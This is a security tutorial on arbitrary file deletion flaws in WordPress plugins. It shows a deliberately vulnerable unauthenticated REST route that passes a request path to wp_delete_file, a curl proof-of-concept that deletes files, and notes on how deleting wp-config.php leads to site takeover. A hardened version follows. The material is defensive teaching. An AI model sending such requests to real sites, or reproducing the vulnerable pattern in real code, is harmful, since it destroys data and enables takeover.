Arbitrary File Deletion
Introduction
This article covers Arbitrary File Deletion vulnerabilities in WordPress plugins and themes: code that deletes a file or directory whose path is derived from user input without proper authorization and path validation. An attacker can abuse such code to delete arbitrary local files and directories on the server, not just the media the feature was written for.
Useful Functions
When auditing a plugin or theme for Arbitrary File Deletion, start from the calls that actually remove something from disk and trace where their path argument comes from:
- PHP related: unlink(), rmdir()
- WordPress related: wp_delete_file(), wp_delete_file_from_directory()
Note that wp_delete_file() only applies the wp_delete_file filter and then calls unlink() on whatever path it is given; it performs no validation of its own, so any check has to happen before the call.
Example Cases
Below is an example of vulnerable code. It registers a REST route whose permission_callback is __return_true, so anyone, authenticated or not, can call it, and it passes a path taken straight from the request body to wp_delete_file without validating it:
add_action("init", "rest_init_setup");
function rest_init_setup(){
    register_rest_route( "myplugin/v1", '/deletemedia/', array(
        'methods'             => "POST",
        'callback'            => 'delete_media_upload',
        // No authorization at all: every visitor may call this route.
        'permission_callback' => '__return_true',
    ) );
}
function delete_media_upload($request){
    // The body is parsed by hand, so none of the REST API's argument
    // validation applies to it.
    $args = json_decode($request->get_body(),true);
    $data = array('status'=>false);
    if(!empty($args['media']) ){
        // Attacker-controlled path passed directly to unlink() via wp_delete_file().
        wp_delete_file( $args['media']['file'] );
        $data = array('status'=>true);
    }
    return new WP_REST_Response( $data, 200 );
}
To exploit this, any unauthenticated user only needs to send a POST request to the /wp-json/myplugin/v1/deletemedia endpoint with a JSON body containing the media.file parameter, which is handed to wp_delete_file and from there to unlink:
curl <WORDPRESS_BASE_URL>/wp-json/myplugin/v1/deletemedia -d '{"media":{"file":"<WORDPRESS_BASE_DIRECTORY>/license.txt"}}' -H 'Content-Type: application/json'
Here <WORDPRESS_BASE_DIRECTORY> is the absolute filesystem path of the WordPress installation, which the attacker has to know or guess (it is frequently a default such as the web server's document root, and often disclosed by PHP error messages). Deleting license.txt is a harmless proof of concept; the same request can remove any file the web server user may delete. Because wp_delete_file ends in unlink(), it removes files only, so directories are not affected by this particular sink. Deleting wp-config.php is the classic high-impact target: WordPress then treats the site as not installed and presents the setup wizard, which lets an attacker complete the installation with a database they control.
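The following hardened version of the same route is an added example and is not code from the original article or from any real plugin; the route name, the myplugin_ prefix, the file parameter and the helper function are assumptions for illustration. It fixes the three problems in the vulnerable code: it requires a capability in permission_callback, declares and validates the argument through the REST API instead of parsing the body by hand, and resolves the supplied path with realpath() so that it must stay inside the uploads directory before wp_delete_file is ever called.

```php
<?php
/*
 * Added example (not from the original article): hardened "deletemedia"
 * REST route. Names prefixed with myplugin_ and the "file" parameter are
 * assumptions made for this illustration.
 */
add_action( 'init', 'myplugin_rest_init_setup' );

function myplugin_rest_init_setup() {
    register_rest_route(
        'myplugin/v1',
        '/deletemedia/',
        array(
            'methods'             => 'POST',
            'callback'            => 'myplugin_delete_media_upload',
            // 1. Authorization: only users allowed to manage media may call this.
            'permission_callback' => function () {
                return current_user_can( 'upload_files' ) && current_user_can( 'delete_posts' );
            },
            // 2. Declared argument: the REST API rejects a missing or
            //    non-string value before the callback runs.
            'args'                => array(
                'file' => array(
                    'required'          => true,
                    'type'              => 'string',
                    'sanitize_callback' => 'sanitize_text_field',
                ),
            ),
        )
    );
}

/*
 * Resolve a user-supplied path relative to the uploads directory and refuse
 * anything that escapes it ("../", absolute paths, symlinks pointing out).
 * Returns the resolved absolute path, or false if it is outside or missing.
 */
function myplugin_resolve_upload_path( $relative ) {
    $upload_dir = wp_get_upload_dir();
    $base       = realpath( $upload_dir['basedir'] );
    if ( false === $base ) {
        return false;
    }
    // realpath() collapses ".." segments and follows symlinks, so the
    // containment check below sees the file system's view of the path,
    // not the string the client sent.
    $candidate = $base . '/' . ltrim( wp_normalize_path( $relative ), '/' );
    $target    = realpath( $candidate );
    if ( false === $target ) {
        return false; // file does not exist
    }
    $base   = trailingslashit( wp_normalize_path( $base ) );
    $target = wp_normalize_path( $target );
    if ( 0 !== strpos( $target, $base ) ) {
        return false; // escaped the uploads directory
    }
    return $target;
}

function myplugin_delete_media_upload( WP_REST_Request $request ) {
    // 3. Use the validated parameter, never a hand-parsed request body.
    $path = myplugin_resolve_upload_path( $request->get_param( 'file' ) );

    if ( false === $path || ! is_file( $path ) ) {
        return new WP_Error(
            'myplugin_bad_path',
            'File not found in the uploads directory.',
            array( 'status' => 400 )
        );
    }

    // Only remove file types WordPress would have accepted as an upload, so
    // a stray .php or .htaccess placed under uploads cannot be targeted either.
    $ftype = wp_check_filetype( $path );
    if ( empty( $ftype['ext'] ) ) {
        return new WP_Error(
            'myplugin_bad_type',
            'Not an allowed upload type.',
            array( 'status' => 400 )
        );
    }

    wp_delete_file( $path );

    return rest_ensure_response( array( 'status' => ! file_exists( $path ) ) );
}
```

With this in place the request from the proof of concept is rejected twice over: an unauthenticated caller fails permission_callback with a 401, and even an authenticated user sending an absolute path or a "../" sequence gets a 400 because realpath() resolves it outside the uploads directory. Where the feature really is about media, the cleaner design is to accept an attachment ID rather than a path and call wp_delete_attachment() after checking current_user_can( 'delete_post', $id ), so that no filesystem path is ever taken from the client at all.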